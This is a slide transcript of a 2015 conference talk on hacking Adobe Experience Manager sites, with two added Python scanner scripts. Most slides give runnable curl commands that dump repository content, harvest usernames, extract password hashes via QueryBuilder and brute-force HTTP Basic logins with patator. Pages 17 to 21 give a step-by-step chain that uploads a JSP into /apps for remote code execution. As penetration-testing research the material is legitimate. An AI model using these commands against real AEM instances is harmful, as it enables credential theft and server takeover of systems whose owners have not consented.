Mikhail Egorov's talk at PHDays (slide transcript, posted 11-Aug-2015)

TRANSCRIPT

Page 1: Hack1ng Adobe Experience Manager sites

Page 2: Who is that guy?

• Mikhail Egorov
• Security researcher
• Works in Odin (Parallels)
• 0ang3el (at) gma1l (d0t) com

Page 3: Related Work

• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
• http://www.slideshare.net/CQCON/prsentation-ben-zahler
• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

Page 4: What do we want

• Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification

Page 5: Sensitive information from JCR

• Use JsonRendererServlet (Sling's default JSON renderer; the selectors control the traversal: a number such as .6 is the depth, .infinity dumps the whole subtree, .tidy pretty-prints the output)

curl -X "GET" http://127.0.0.1:8080/.json
curl -X "GET" http://127.0.0.1:8080/.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.infinity.json

Page 6: Installed OSGI bundles

• List of all bundles
• QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

curl -X "GET" http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/bin/querybuilder.json

Page 7: Custom scripts

• List custom scripts (under /apps)
• List compiled custom scripts from the cache (under /var/classes)

curl -X "GET" http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/var/classes.tidy.infinity.json

Page 8: Usernames

• Dump content node properties
• Use a regular expression to extract usernames from the *By properties (jcr:createdBy, jcr:lastModifiedBy, cq:lastReplicatedBy, ...); pipe the dump into it

curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
python -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer(r"\".+?By\":\"(.+?)\"", sys.stdin.read())))' |
sort -u

Page 9: Password hashes

• Use the QueryBuilder bundle: query for nodes of type rep:User and request only the rep:principalName and rep:password properties

curl -X "GET" "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"
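The checks on pages 5 to 7 and 9 are one idea applied to several paths: ask Sling's JSON renderer (or QueryBuilder) for a node and see whether the server answers. The script below is an added example, not code from the slides or from Adobe: it builds the same probe URLs from the slide paths and selectors, sends them with or without HTTP Basic credentials, and classifies each response as exposed, leaking password hashes, or closed. The target host, the extra probe of /content, and the sample responses used in comments are assumptions for illustration.

```python
"""Added example: probe the Sling JsonRendererServlet / QueryBuilder paths
from Egorov's slides and classify what the target returns.  The host, the
credentials and the sample bodies are assumptions, not from the talk."""
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

# Node paths from pages 5-7 (plus /content, assumed), each tried with the
# Sling selectors from page 5.
PROBE_PATHS = ["/", "/bin", "/apps", "/var/classes", "/content"]
SELECTORS = [".json", ".6.json", ".tidy.6.json", ".tidy.infinity.json"]

# QueryBuilder request from page 9.  safe=":" keeps the colons readable and
# urllib.parse.quote turns the space into %20, exactly as on the slide.
QUERYBUILDER = "/bin/querybuilder.json?" + urllib.parse.urlencode({
    "type": "rep:User",
    "p.hits": "selective",
    "p.properties": "rep:principalName rep:password",
    "p.limit": "100",
}, safe=":", quote_via=urllib.parse.quote)


def probe_urls(base):
    """Every URL to try, e.g. http://host:8080/apps.tidy.infinity.json."""
    base = base.rstrip("/")
    urls = []
    for path in PROBE_PATHS:
        # the root keeps its slash so the result is /.json as on the slide
        node = "/" if path == "/" else path.rstrip("/")
        for sel in SELECTORS:
            urls.append(base + node + sel)
    urls.append(base + QUERYBUILDER)
    return urls


def classify(status, body):
    """Map one HTTP response to a finding.

    'hashes'  - QueryBuilder hits that carry rep:password values
    'exposed' - 200 with a JSON object holding jcr:/sling: properties
    'closed'  - anything else (401/403/404, HTML login page, non-JSON)
    """
    if status != 200:
        return "closed"
    try:
        doc = json.loads(body)
    except ValueError:
        return "closed"
    if not isinstance(doc, dict):
        return "closed"
    hits = doc.get("hits")
    if isinstance(hits, list) and any(
            isinstance(h, dict) and "rep:password" in h for h in hits):
        return "hashes"
    if any(k.startswith(("jcr:", "sling:")) for k in doc):
        return "exposed"
    return "closed"


def scan(base, user=None, password=None, timeout=5):
    """Issue all probes and return {url: finding}.  Run without credentials
    this is the anonymous check that a hardened instance should fail."""
    headers = {}
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        headers["Authorization"] = "Basic " + token
    results = {}
    for url in probe_urls(base):
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                status = resp.status
                body = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:   # 401/403/404/500 land here
            status, body = e.code, ""
        except urllib.error.URLError:         # refused, DNS, timeout
            status, body = 0, ""
        results[url] = classify(status, body)
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    for url, finding in scan(target).items():
        print(f"{finding:8} {url}")
```

Run it once anonymously and once with each credential you hold; any "exposed" or "hashes" line in the anonymous run is a finding on its own, before any brute forcing.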

Page 10: Anonymous modification

• Dump content node properties
• Use a regular expression to check whether any *By property names anonymous; pipe the dump into it

curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
python -c 'import sys,re; m = re.search(r"\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification:", "Yes" if m else "No")'
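Pages 8 and 10 grep the raw JSON text for any property whose name ends in By. The same dump can be walked as a tree, which also tells you where the anonymous user wrote, not only that it did. The script below is an added example and not from the talk; the sample dump it carries is constructed to look like a /content.infinity.json answer and is an assumption, as is the page structure (geometrixx, usergenerated) used in it.

```python
"""Added example: walk a Sling .infinity.json dump as a tree and report the
principals in *By properties (page 8) and the nodes touched by 'anonymous'
(page 10).  SAMPLE_DUMP is constructed; it is not output from a real site."""
import json
import sys

BY_SUFFIX = "By"   # jcr:createdBy, jcr:lastModifiedBy, cq:lastReplicatedBy, ...


def walk(node, path="/"):
    """Yield (path, property, value) for every property in the nested dump.
    Dict-valued members are child nodes; everything else is a property."""
    for key, value in node.items():
        if isinstance(value, dict):
            yield from walk(value, path.rstrip("/") + "/" + key)
        else:
            yield path, key, value


def principals(dump):
    """Set of user names seen in any *By property."""
    return {v for _, k, v in walk(dump)
            if k.endswith(BY_SUFFIX) and isinstance(v, str)}


def anonymous_writes(dump):
    """Sorted paths where a *By property names 'anonymous', i.e. nodes the
    anonymous user was allowed to create or modify."""
    return sorted({p for p, k, v in walk(dump)
                   if k.endswith(BY_SUFFIX) and v == "anonymous"})


def report(dump):
    """Summary matching the two slide one-liners, plus the offending paths."""
    anon = anonymous_writes(dump)
    return {
        "usernames": sorted(principals(dump)),
        "anonymous_modification": bool(anon),
        "anonymous_paths": anon,
    }


# Constructed sample in the shape the JsonRendererServlet returns.
SAMPLE_DUMP = json.loads("""{
  "jcr:primaryType": "sling:OrderedFolder",
  "jcr:createdBy": "admin",
  "jcr:created": "Sun May 03 2015 21:24:38 GMT+0300",
  "geometrixx": {
    "jcr:primaryType": "cq:Page",
    "jcr:createdBy": "admin",
    "jcr:content": {
      "jcr:primaryType": "cq:PageContent",
      "jcr:lastModifiedBy": "author",
      "cq:lastReplicatedBy": "admin",
      "sling:resourceType": "geometrixx/components/contentpage",
      "par": {
        "jcr:primaryType": "nt:unstructured",
        "text": {
          "jcr:primaryType": "nt:unstructured",
          "jcr:lastModifiedBy": "anonymous",
          "text": "guestbook entry"
        }
      }
    }
  },
  "usergenerated": {
    "jcr:primaryType": "sling:Folder",
    "jcr:createdBy": "anonymous"
  }
}""")


if __name__ == "__main__":
    # Usage: curl -s http://127.0.0.1:8080/content.infinity.json | python3 jcr_by.py
    data = SAMPLE_DUMP if sys.stdin.isatty() else json.load(sys.stdin)
    print(json.dumps(report(data), indent=2))
```

Because the walk keeps the node path, the output points straight at the component (here a guestbook text node and a usergenerated folder) whose ACL lets anonymous write, which is what you need to fix or to abuse next.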

Page 11: Getting access

• Try default user credentials: admin/admin, author/author, anonymous/anonymous
• Offline attack (brute-force the hashes)
• Online attack (brute-force HTTP Basic credentials against the POST servlet bundle)

patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5

Page 12: You have access, now what?

• XSS
• CSRF
• DoS
• Read local files
• RCE

Not covered, sorry!

Page 13: Webdav bundle, XXE

• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
• The WebDAV OSGi bundle uses an XML parser that is not properly initialized (external entity resolution is left enabled)
• Exploit - https://www.exploit-db.com/exploits/37110/

Page 14: Доклад Михаила Егорова на PHDays

• Out-of-bound exploitationhttp://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

• Pros: works with anonymous credentials

• Cons: you need external server, instable

• Inbound exploitation• Pros: you do not need external server, more stable

• Cons: you need credentials of the user that is able to modify some node in JCR

Webdav bundle, XXE

Page 15: Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Page 16: Remote code execution

• We have a node, http://127.0.0.1:8080/content/rce, whose sling:resourceType is rcetype
• We have a script exec.jsp stored as a child of the resource-type node http://127.0.0.1:8080/apps/rcetype; Sling's script resolution looks up resource type rcetype under the /apps search path, so exec.jsp becomes the script for selector exec
• When someone navigates to http://127.0.0.1:8080/content/rce.exec, our exec.jsp is executed

The rcetype node (a folder holding the nt:file exec.jsp):
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

The rce node bound to it:
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

Page 17: Remote code execution

• Step I: Create rcetype node

curl -u admin:admin -Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype

Page 18: Remote code execution

• Step II: Upload script exec.jsp to rcetype node (with the Sling POST servlet the form field name, exec.jsp, becomes the name of the nt:file child)

curl -u admin:admin -F"exec.jsp=@exec.jsp" http://127.0.0.1:8080/content/rcetype

Page 19: Remote code execution

• Step III: Copy rcetype to /apps

curl -u admin:admin -F:operation=copy -F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype

Page 20: Remote code execution

• Step IV: Create rce node bound to rcetype

curl -u admin:admin -Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce

Page 21: Remote code execution

• Step V: Launch jsp script

curl -X "GET" http://127.0.0.1:8080/content/rce.exec

Page 22: Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Page 23: Ask a Ninja